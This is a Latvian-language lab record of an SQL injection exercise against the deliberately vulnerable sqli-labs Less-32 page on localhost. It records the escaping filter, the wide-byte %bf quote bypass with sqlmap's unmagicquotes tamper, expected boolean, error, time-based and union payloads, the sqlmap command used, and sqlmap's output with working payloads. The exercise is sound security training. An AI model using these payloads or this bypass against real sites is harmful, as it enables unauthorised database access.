============================================
1. Īpašība: pirms bīstamiem simboliem (šajā gadījumā pirms pēdiņām) ir filtrs, kas ievieto "\", kļūdas gadījumā ziņojums parādās tur pat, kur rezultāts
2. Nepiciešams tampering: jā, --tamper=unmagicquotes
3. Sagaidāmais rezultāts: 
3.1. boolean-based: ?id=-1%bf' OR 1=1-- -
3.2. error-based: ?id=-1%bf'
3.3. time-based: ?id=-1%bf' OR SLEEP(1)-- -
3.4. union: ?id=-1%bf' UNION SELECT 1,2,3-- -
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 2220500 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-32/?id=1" -p id -risk=3 --level=5 --tamper=unmagicquotes

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. GET parameter 'id' is vulnerable. Doo you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 1793=1793-- aKfc

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x717a6b7a71,(SELECT (ELT(2842=2842,1))),0x716b717a71),2842)-- mEaz

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7952 FROM (SELECT(SLEEP(5)))obpF)-- xQDj

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-5337' UNION ALL SELECT NULL,NULL,CONCAT(0x717a6b7a71,0x73797773495a6f674e786a5664476a744552776a616d5951516e4f757a56666c7058674d64586c70,0x716b717a71)-- -
---
web application technology: Apache 2.4.38, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
